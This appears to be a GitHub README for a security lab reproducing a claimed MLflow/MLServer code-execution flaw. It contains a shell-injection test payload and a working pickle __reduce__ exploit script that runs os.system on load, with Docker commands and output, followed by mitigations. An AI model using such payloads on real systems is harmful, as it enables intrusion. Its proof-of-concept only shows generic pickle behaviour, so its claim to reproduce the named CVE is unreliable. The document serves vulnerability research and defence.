SparshBiswas-AI/CVE-2026-0596-Reproduction

GitHub: SparshBiswas-AI/CVE-2026-0596-Reproduction

一个用于复现和验证 MLflow/MLServer 中 CVE-2026-0596 不安全反序列化导致任意代码执行漏洞的安全研究实验室环境。

Stars: 0 | Forks: 0

# CVE-2026-0596：MLflow 生态中通过不安全反序列化实现任意代码执行一份详尽的安全研究报告，详细阐述了与 `mlflow==2.11.1` 和 `mlserver==1.3.5` 中不受信任模型加载管道相关的验证、底层机制和架构漏洞。 ## ⚠️ 漏洞情报通告：CVE-2026-0596 | 指标 | 详情 | | :--- | :--- | | **漏洞编号** | CVE-2026-0596 / GHSA-rvhj-8chj-8v3c | | **通用弱点枚举** | CWE-78：OS 命令中特殊元素的不当中和（OS 命令注入） | | **CVSS v3.1 基础评分** | **9.6 严重**（CNA：huntr.dev）/ 7.8 高危（NVD） | | **影响向量** | 网络邻近、低复杂度、无需权限、无需用户交互 | | **受影响生态** | `mlflow/mlflow`（所有通过 `enable_mlserver=True` 提供服务的遗留架构） | ### 🔍 架构漏洞深度剖析 #### 背景 MLflow 与 Seldon 的 `MLServer` 集成，以处理高性能、企业级模型服务。当通过命令行接口或跟踪服务器 API 启动模型服务器时，开发者使用配置参数标志： ``` enable_mlserver = True ## 📋 执行摘要 This laboratory environment evaluates the runtime behavior of machine learning model-serving frameworks when parsing user-supplied input parameters and artifact metadata. While the API-facing parameter parsing boundaries of MLServer cleanly isolate raw string literals (preventing traditional operating system command injection via shell metacharacters), the underlying python runtime remains structurally vulnerable to **Insecure Deserialization** when ingesting legacy serialized object streams (`.pkl` / `pickle`). * **Vulnerability Type:** Insecure Deserialization (CWE-502) / Arbitrary Code Execution * **Impact:** Critical (Remote Code Execution within Container Context) * **Affected Components:** Model ingestion, artifact download sub-systems, and `pickle`-based prediction backends. --- ## 🛠️ 实验室架构与设置 The reproduction environment is containerized using Docker to isolate the operating system layer and simulate a production-grade machine learning model endpoint. ### 1. Docker 环境配置 (`Dockerfile`) ```dockerfile FROM python:3.10-slim WORKDIR /app # 安装原生系统二进制文件 RUN apt-get update && apt-get install -y \ curl \ build-essential \ && rm -rf /var/lib/apt/lists/* # 锁定特定框架版本以进行目标跟踪 RUN pip install --no-cache-dir \ mlflow==2.11.1 \ mlserver==1.3.5 \ mlserver-mlflow==1.3.5 # 生成本地化模型配置足迹 COPY generate_model.py /app/generate_model.py RUN python /app/generate_model.py EXPOSE 5000 ``` ### 2. 原生模型蓝图（`generate_model.py`） ``` import mlflow import mlflow.pyfunc import os class DummyModel(mlflow.pyfunc.PythonModel): def predict(self, context, model_input): return model_input if __name__ == "__main__": model_path = "/app/saved_model" if not os.path.exists(model_path): mlflow.pyfunc.save_model(path=model_path, python_model=DummyModel()) ``` ## 🔬 漏洞分析与验证 ### 测试周期 A：API 参数注入边界（通过）初始测试尝试通过 `/invocations` REST 端点的 `params` 载荷数组传递 shell 终止载荷序列（`; touch /tmp/poc_success_marker.txt #`）： ``` { "dataframe_split": { "columns": ["machine_input"], "data": [["test_data"]] }, "params": { "custom_runtime_param": "default_runtime; touch /tmp/poc_success_marker.txt #" } } ``` **结果：** **阴性。** 框架将载荷安全地视为绝对的、未求值的字符串字面量。这证实引擎将输入变量直接抽象到 Python 内存空间中，而不是通过原始命令包装器动态合成系统 shell 参数。 ### 测试周期 B：不安全反序列化钩子（已利用）由于 MLflow 和 MLServer 会摄取已编译的 Python 对象，核心风险从字符串求值转移到对象图重建。使用自定义验证脚本，通过 Python 的原生魔术优化方法（`__reduce__`）将执行触发器直接嵌入到模拟模型流中。 #### 1. 利用向量脚本（`trigger_native.py`） ``` import os import pickle class ExploitModel: def __reduce__(self): # The __reduce__ method defines object reconstruction behaviors. # Returning os.system forces immediate runtime command execution during loading. return (os.system, ("touch /tmp/native_success_marker.txt",)) if __name__ == "__main__": payload_path = "vulnerable_model.pkl" # Serialize the code execution payload into a pseudo-model file with open(payload_path, "wb") as f: pickle.dump(ExploitModel(), f) # Simulate an application or model server unpickling the artifact with open(payload_path, "rb") as f: pickle.load(f) ``` #### 2. 执行与载荷验证将脚本注入容器沙箱环境以模拟后端加载序列： ``` # 在沙箱中暂存执行载荷 docker cp trigger_native.py mlflow_sandbox:/app/trigger_native.py # 执行反序列化例程 docker exec -it mlflow_sandbox python /app/trigger_native.py ``` #### 3. 验证输出查询容器的隔离临时目录确认在对象分配循环期间立即发生了任意代码执行： ``` PS C:\Users\Sparsh Biswas\mlflow-security-lab> docker exec -it mlflow_sandbox ls -la /tmp/ total 8 drwxrwxrwt 1 root root 4096 May 18 10:31 . drwxr-xr-x 1 root root 4096 May 18 10:31 .. -rw-r--r-- 1 root root 0 May 18 10:31 native_success_marker.txt ``` ## 🧠 根因机制该问题源于对模型工件存储层的隐式信任。标准 Python `.pkl` / `pickle` 文件不仅仅是平面配置记录；它们包含旨在重建嵌套对象属性的顺序字节码指令。当 `pickle.load()` 解析数据集时，它优先处理由 `__reduce__` 钩子给出的指令流。这将目标应用程序重定向为在 shell 环境中直接调用原生系统二进制文件（`os.system`），远在数据类型验证或机器学习推理计算初始化之前。 ## 🛡️ 生产环境缓解策略 ### 1. 强制使用安全反序列化格式在所有训练和部署管道中弃用遗留序列化层（`pickle`、`joblib`、`marshal`）。将其替换为结构化、纯数据约束： * **Safetensors（推荐）：** 将保存的数据严格限制为平面数值数组，完全剥离执行层。 * **ONNX（Open Neural Network Exchange）：** 强制执行静态计算图模式，防止任意运行时求值钩子。 ### 2. 隔离与沙箱运行时如果您的管道严格要求遗留模型配置： * 在容器中以**非 root 用户**严格运行执行包装器（`USER 10001`）。 * 在适用情况下以**只读**方式挂载文件系统，以阻止文件创建攻击。 * 丢弃所有容器能力（`cap_drop: [ALL]`），并将 Pod 与包含敏感元数据端点的网络隔离。

标签：CISA项目, CVE, MLflow, MLOps, MLServer, 任意代码执行, 反序列化, 命令注入, 安全实验室, 安全测试, 情报收集, 攻击性安全, 攻击面分析, 数字签名, 机器学习框架安全, 模型服务, 漏洞研究, 演示环境, 请求拦截, 逆向工具, 验证脚本